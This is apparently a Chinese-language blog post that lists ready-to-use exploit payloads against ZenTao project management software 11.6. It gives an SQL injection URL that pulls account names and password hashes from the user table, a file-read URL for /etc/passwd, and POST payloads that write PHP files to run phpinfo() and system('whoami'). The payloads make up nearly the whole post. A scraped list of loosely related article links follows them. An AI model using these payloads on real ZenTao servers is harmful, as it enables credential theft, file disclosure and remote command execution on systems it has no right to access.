一.SQL注入漏洞

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

二.任意文件读取漏洞

Payload:

http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd

三.远程代码执行漏洞

1)远程代码执行命令phpnifo();

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111

POST: fileContent=<?php phpinfo(); ?>

Payload2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=1111/1

POST: fileContent=<?php phpinfo(); ?>

2)远程代码执行命令system('whoami');

Payload 1:

http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=2222

POST: fileContent=<?php system('whoami'); ?>

Payload 2:

http://127.0.0.1/zentaopms/www/ api-getModel-api-getMethod-filePath=2222/2

POST: fileContent=<?php system('whoami'); ?>

禅道CMS 11.6漏洞相关推荐

  1. 禅道CMS文件上传漏洞(CNVD-C-2020-121325)

    1.影响版本 <=12.4.2 2.漏洞描述 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本 ...

  2. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

  3. 禅道项目管理系统RCE漏洞复现+利用

    1.漏洞概述 禅道研发项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理.任务管理.bug管理.缺陷管理.用例管理.计划发布等功能,实现了软件的完整生命周期管理.2023年1月6日, ...

  4. 禅道linux一键安装漏洞,禅道漏洞第二弹后台读写任意文件/getshell

    漏洞1: 任意文件写入漏洞 自评风险:严重 问题出在这里 这里新建方法的时候,其实会写到限定目录的,限定后是无法访问的所以这里,即使成功写也无法利用.不过,我们能跳出它的限制 老规矩,看poc POS ...

  5. (20)文件上传漏洞:原理、原因、常见触发点分析,vulhub、upload、公开cms上传漏洞多种方法测试

    目录 理解文件上传漏洞: 文件上传漏洞: 文件上传漏洞: WebShell: 一句话木马: 产生上传漏洞原因: 原因: 常见的问题: 危害: 触发点,并判断是否存在文件上传漏洞: 触发点: 查找方法: ...

  6. 禅道 11.6版本 后台漏洞 复现和审计

    文章目录 查看版本漏洞 sql注入 任意文件读取 rce 禅道 11.6版本下载地址 本次复现环境windows 先搞清楚禅道参数的传递方式,进入index.php慢慢看 先发现了这个语句: 这个导致 ...

  7. 禅道项目管理_禅道 11.6.1 版本发布,完善细节,修复 Bug

    禅道项目管理软件集产品管理.项目管理.质量管理.文档管理.组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程.禅道官网:www.zentao.net. 大家好,禅道 ...

  8. 禅道 11.4.1 版本发布,主要优化细节

    禅道项目管理软件集产品管理.项目管理.质量管理.文档管理.组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程.禅道官网:www.zentao.net. 大家好,禅道 ...

  9. 禅道11.0windows本机安装

    为了验证禅道的某个功能,需要用到生产上的数据,又不能在生产上进行.只能在本地搭建一套禅道,还原生产的数据到本地. 1.下载禅道 生产上用的是禅道11.0,数据库是11.0版本的数据库,为了更好兼容,下 ...

最新文章

  1. Mysql学习总结(4)——MySql基础知识、存储引擎与常用数据类型
  2. (五) 定点迭代法求根
  3. ORACLE 10046 Trace
  4. 阿里专家分享:企业级大数据轻量云实践
  5. Enterprise search result view column显示technical name
  6. Magento:在head.phtml中获取产品属性 echo a product attribute in magento head.phtml
  7. IDEA Docker 插件安装
  8. 学习精华——成长篇(三)
  9. Javascript-逻辑运算符()
  10. Javascript jquery css 写的简单进度条控件
  11. Uncaught SyntaxError: Unexpected token export
  12. USACO_Prime Cryptarithm
  13. Java在W10_java——基础 在w10环境下如何配置java环境
  14. 易改衣完成 5000 万 A 轮融资,唯品会战略投资
  15. 10的28次方C语言,c语言编程测定28的28次方有多少位
  16. U盘做成Mac启动盘之后怎么恢复成原来的U盘(U盘变成efi怎么恢复)
  17. Linux 创建无线热点
  18. 服务器直接ip登录显示令牌错误,SSL 配置动态令牌认证,令牌同步失败提示获取认证服务器配置失败或本地IP与认证服务器IP地址不匹配...
  19. [LuoGu] P3957 跳房子
  20. 戴蒙德对新冠疫情等的分析与看法笔记

热门文章

  1. 推荐一个可以在电脑上玩所有下载渠道手游的安卓模拟器
  2. Oracle_登录数据库系统
  3. python学习路线图(初级阶段,中级阶段,高级阶段)
  4. 阿里系App抓包分析(三)
  5. 音视频开发-SRS 4.0流媒体服务器系列
  6. [SHOI2008]仙人掌图
  7. Java 17的这些新特性,Java迈入新时代
  8. 【力扣3题】快乐数有效的字母异位词字符串中的单词数
  9. 免费合并多个PDF文件
  10. 网络切片技术缺点_什么是网络切片?